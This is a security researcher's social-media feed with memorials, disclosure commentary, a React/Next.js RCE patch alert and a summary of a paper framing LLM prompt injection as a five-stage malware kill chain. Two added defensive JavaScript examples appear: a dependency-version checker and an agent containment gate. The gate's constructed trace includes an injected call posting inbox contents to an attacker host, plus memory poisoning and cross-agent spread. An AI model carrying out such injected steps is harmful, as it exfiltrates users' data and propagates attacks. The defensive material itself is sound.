Chris Wysopal

Co-founder/Chief Security Evangelist Veracode. Former L0pht security researcher. Builds tools to find vulnerabilities in code at scale. Twitter: @weldpond

2026-03-05

@obrientg That's Par! Just 20 years younger than in the first photo.

2026-02-27

If you have any photos or stories to share please reply here. This is a photo of Par in Times Square during HOPE in 2006.

2026-02-27

RE: infosec.exchange/@Weld/1161007

🕯️ Jason Snitker "Parmaster" Memorial 🕯️
Feb 28, 2026 04:00 PM

Debra Kavaler Wysopal will be hosting this online memorial service for Parmaster along with Jason's family from Atlantic City, NJ.

Confirmed Speakers:

Par's Aunt
Deb
Mudge
John Lee
Tom Sloan (former Secret Service)

The memorial service will be recorded.

Registration Link: us02web.zoom.us/meeting/regist

2026-02-20

My wife Deb and I are heartbroken to share the sad news that our old friend Jason Snitker AKA Parmaster has passed away.

Par was one of the sharpest and most elusive minds of the early underground hacking scene. As chronicled in “Underground”, he spent years navigating the emerging digital frontier, connecting with hackers internationally and repeatedly staying ahead of the United States Secret Service during a prolonged investigation in the early 1990s.

His story in “Underground” includes the Citibank investigation that helped trigger the pursuit, as well as his time in custody at Rikers Island, where he found himself playing Dungeons & Dragons.

Par’s life reflected both the intensity of the early hacking world and the very real consequences that came with it. He was part of a generation that explored the edges of a new technological landscape before most of the world even understood it existed.

There will be an online memorial gathering on Feb 28. More details to follow.

The old-school hacking community has lost a true original. Rest in peace, Par. If anyone has stories or memories, please share them here.

2026-02-19

New $10k FULU bug bounty for Ring video doorbells just announced. bounties.fulu.org/bounties/rin

2026-01-30

In order to collect a bug bounty, a researcher was required to sign an NDA to not discuss the vulnerability.

zuernerd.github.io/blog/2026/0

2026-01-28

Hackers & vendors working together on coordinated disclosure led to working together to secure products, systems and networks

2026-01-28

Vulnerability disclosure norms are a control system for incentives. They made vulnerability handling predictable enough to industrialize.

We get more finding, more fixing, and more secure software.

2026-01-23

ATM Jackpotting, still alive in 2025

Two attackers physically popped ATMs, plugged in a laptop, dropped malware, and forced machines to dump all cash.

This isn’t an isolated case. DOJ has charged dozens tied to multi-state jackpotting rings, including members of Tren de Aragua. Same playbook, scaled.

Props where due: this entire class of attacks was dragged into the open by Barnaby Jack, who live-demoed ATM jackpotting at Black Hat in 2010 and literally coined the term. He showed that ATMs were just poorly defended computers with cash attached.

2026-01-15

“Prompt injection” is a misleading label.

What we’re seeing in real LLM systems looks a lot more like malware campaigns than single-shot exploits.

This paper argues LLM attacks are a new malware class, Promptware, and maps them to a familiar 5-stage kill chain:

• Initial access (prompt injection)
• Priv esc (jailbreaks)
• Persistence (memory / RAG poisoning)
• Lateral movement (cross-agent / cross-user spread)
• Actions on objective (exfil, fraud, execution)

If you’ve ever thought: “why does this feel like 90s/2000s malware all over again?”, that’s the point.

Security theater around “guardrails” misses the real issue:

Models can’t reliably distinguish instructions from data.

Assume initial access. Design for containment.

arxiv.org/html/2601.09625v1
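One way to act on "assume initial access, design for containment" is a gate between the agent and its tools that never reads prompt text at all and only judges each proposed tool call against a policy the application fixed before the task began. This is an added example, not code from the post or the linked paper; the task names, tool names, hosts and the action trace are constructed, and the stage labels follow the kill chain listed above.

```javascript
// Added example (constructed, not the post's or the paper's code): a containment
// gate between an LLM agent and its tools. It ignores prompt text entirely and
// judges only the proposed action against a policy fixed before the task began.

// Per-task capabilities, set by the application, never changeable by the model.
const TASK_POLICY = {
  summarize_inbox: { tools: ["read_email"], egressHosts: [], memoryWrite: false, agentSend: false },
  book_travel: { tools: ["read_email", "http_get"], egressHosts: ["api.airline.example"], memoryWrite: false, agentSend: false },
};

// Kill-chain stage (the post's mapping) that a denied tool call would advance.
const STAGE_BY_TOOL = { set_system_prompt: "privilege-escalation", memory_write: "persistence",
  send_to_agent: "lateral-movement", http_post: "actions-on-objective", send_email: "actions-on-objective" };
function deny(reason, action) {
  return { allow: false, reason, stage: STAGE_BY_TOOL[action.tool] || "actions-on-objective" };
}

// Decide one proposed action; riskier classes are checked first so the denial
// is attributed to the stage it would have reached.
function evaluateAction(task, action) {
  const policy = TASK_POLICY[task];
  if (!policy) return deny("unknown task", action);
  if (action.tool === "memory_write" && !policy.memoryWrite) return deny("memory writes disabled", action);
  if (action.tool === "send_to_agent" && !policy.agentSend) return deny("cross-agent messaging disabled", action);
  if (!policy.tools.includes(action.tool)) return deny("tool not in task allowlist", action);
  if (action.url !== undefined) {
    const host = new URL(action.url).hostname; // egress is allowlisted by host, per task
    if (!policy.egressHosts.includes(host)) return deny(`egress to ${host} not allowed`, action);
  }
  return { allow: true };
}

// Run a trace of proposed actions; returns each decision and the distinct
// kill-chain stages the gate blocked (useful as a detection signal).
function contain(task, actions) {
  const decisions = actions.map((a) => ({ tool: a.tool, ...evaluateAction(task, a) }));
  const blockedStages = [...new Set(decisions.filter((d) => !d.allow).map((d) => d.stage))];
  return { decisions, blockedStages };
}

// Constructed trace: after reading a message that carried injected instructions,
// the model proposes exfiltration, persistence and spread. Only the read passes.
const INJECTED_TRACE = [
  { tool: "read_email", id: "msg-1" },
  { tool: "http_post", url: "https://collector.attacker.example/drop", body: "<inbox contents>" },
  { tool: "memory_write", key: "standing_orders", value: "<injected text>" },
  { tool: "send_to_agent", target: "calendar-agent", text: "<injected text>" },
];
console.log(contain("summarize_inbox", INJECTED_TRACE));
```

The blocked stages are worth emitting as telemetry: a session that trips persistence or lateral-movement denials is the campaign-shaped behaviour the post describes, not a one-off bad prompt.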

2026-01-15

"A draft amendment to the BND Act, circulating by German media, would transform the agency’s reach by authorizing it to break into foreign digital systems, collect and store large portions of internet traffic, and analyze those communications retroactively."

reclaimthenet.org/germany-bnd-

2026-01-13

Before bug bounties, before root shells, before the word hacker meant anything at all there was a blind kid who whistled 2600 Hz and bent Ma Bell to his will.

Joybubbles tells the story of Joe Engressi, the original phone phreak and a reminder that hacking started as curiosity, play, and defiance.

Sundance screening.
festival.sundance.org/program/

2026-01-12

CES Worst in Show is a reminder that “innovation” now means:

more attack surface, less ownership, permanent surveillance, and DRM on objects you physically bought.

Congratulations to the ad-powered fridge for completing the arc.

youtube.com/watch?v=cxZgILm95BU

2026-01-08

“The Conscience of a Hacker” by The Mentor is 40 years old today.

2025-12-17

I’m pleased to be serving on the conference committee and review board for [un]prompted, a new practitioner-led AI security conference taking place March 3–4 at Salesforce Tower in San Francisco.

This event is intentionally community-focused and grounded in reality. The emphasis is on what actually works in AI security today—from simple tools and practical approaches, through strategy and governance, all the way to offensive and defensive techniques.

If you’re working hands-on with AI systems, I strongly encourage you to submit a talk. Take a look at the conference, the CFP, and the review board’s guidance on the kinds of submissions we’re hoping to see.

It should be a smart, useful, and enjoyable event—and, as the site puts it, a chance to take AI back from the marketers.

unpromptedcon.org

2025-12-03

🚨 Critical React + Next.js RCE Alert 🚨
New flaws in the React Server Components “Flight” protocol (CVE-2025-55182 & CVE-2025-66478) allow unauthenticated remote code execution on default installations.

Attackers only need one malicious HTTP request to take over a server.

Wiz reports 39% of cloud environments are vulnerable.

If you're running:
• React 19.0–19.2
• Next.js 14.3.0-canary, 15.x, 16.x (App Router)
• Any framework bundling react-server (Redwood, Waku, Vite/Parcel RSC plugins, etc.)

👉 You are likely exposed. Patch immediately.

Updates now available:
React 19.0.1 / 19.1.2 / 19.2.1
Next.js 14.3.0-canary.88 / 15.0.5+ / 16.0.7

Full RCE. Remote. Unauthenticated. Near-100% exploit reliability.

Patch today. Do not wait.
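A quick way to check whether a project sits in the affected lines is to compare resolved dependency versions against the fixed versions in the alert. This is an added example, not code from the post, React or Next.js; the package names and version ranges are taken from the post's wording (so "15.x" is treated as fixed at 15.0.5+), and the sample dependency map is constructed.

```javascript
// Added example (constructed; not from the post, React or Next.js): flag installed
// versions against the affected lines and first fixed versions the alert lists.
// Names and ranges mirror the post's wording; confirm them against the advisory.
const FIXES = {
  // affected line -> first fixed version in that line (the post gives "15.0.5+")
  react: { "19.0": "19.0.1", "19.1": "19.1.2", "19.2": "19.2.1" },
  next: { "14.3": "14.3.0-canary.88", "15": "15.0.5", "16": "16.0.7" },
};
// Split "14.3.0-canary.88" into numeric core parts and prerelease parts.
function parseVersion(v) {
  const [core, pre = ""] = v.split("-", 2);
  const nums = core.split(".").map(Number);
  const preParts = pre ? pre.split(".").map((p) => (/^\d+$/.test(p) ? Number(p) : p)) : [];
  return { nums, preParts };
}

// Semver-style ordering: core numbers first; a prerelease sorts before the plain
// release of the same core; then prerelease parts are compared left to right.
function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    const d = (pa.nums[i] || 0) - (pb.nums[i] || 0);
    if (d !== 0) return d;
  }
  if (!pa.preParts.length || !pb.preParts.length) return pb.preParts.length - pa.preParts.length;
  for (let i = 0; i < Math.max(pa.preParts.length, pb.preParts.length); i++) {
    const x = pa.preParts[i], y = pb.preParts[i];
    if (x === undefined || y === undefined) return x === undefined ? -1 : 1;
    if (x !== y) return typeof x === "number" && typeof y === "number" ? x - y : x < y ? -1 : 1;
  }
  return 0;
}
// Classify one dependency: not tracked, unaffected line, VULNERABLE or patched.
function checkDependency(pkg, version) {
  const lines = FIXES[pkg];
  if (!lines) return { affected: false, status: "not-tracked" };
  const hit = Object.entries(lines).find(([line]) => version.startsWith(line + "."));
  if (!hit) return { affected: false, status: "unaffected-line" };
  const vulnerable = compareVersions(version, hit[1]) < 0;
  return { affected: true, fixedIn: hit[1], status: vulnerable ? "VULNERABLE" : "patched" };
}

// Audit a flat { name: version } map, e.g. one built from a lockfile.
function auditLock(deps) {
  return Object.entries(deps).map(([name, version]) => ({ name, version, ...checkDependency(name, version) }));
}
// Constructed sample of resolved dependency versions.
const SAMPLE_DEPS = { react: "19.2.0", "react-dom": "19.2.0", next: "15.0.4", lodash: "4.17.21" };
console.table(auditLock(SAMPLE_DEPS));
```

Feed it the versions actually resolved in your lockfile rather than the ranges in package.json, since a caret range can hide an unpatched install.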

2025-11-18

Veracode Research finds that OpenAI GPT-5 writes more secure code than other models.

forbes.com/sites/the-wiretap/2

2025-11-15

Delchi and I having a pre-party discussion at @L0phtHeavyInd circa 1999

2025-11-15

I'm heartbroken to share that my friend of 30 years, Arthur Phillip Delchi, @Delchi, DJ Delchi, FIRST REGENT OF GOTHAM—has left us.

A founding force behind DEF CON’s Hackers with Disabilities village, a L0pht regular who DJed our wildest parties (two of those moments captured below), and an early researcher tearing apart IoT and other devices for the sheer love of understanding how things break.

He was just as legendary in the NYC goth scene: From the earliest days spinning ethereal sets at Parallax, Long Black Veil, Sanctum at CBGB’s Basement, and his own Bitter Paradise at Downtime… to guest spots at Absolution, Albion, The Bank, Webster Hall, and beyond… to carrying the dark flame to Vegas in recent years—Delchi was a pillar of the night.

He lived in the pages too, as “The Voltoids Guy” in Voltaire’s Oh My Goth and “Lord Delchi” in GloomCookie, before becoming a comic creator himself with his comic Noduttu.

Rest easy, old friend. The dance floor, the lab, and the shadows won’t be the same without you.

Hail and farewell, traveler.
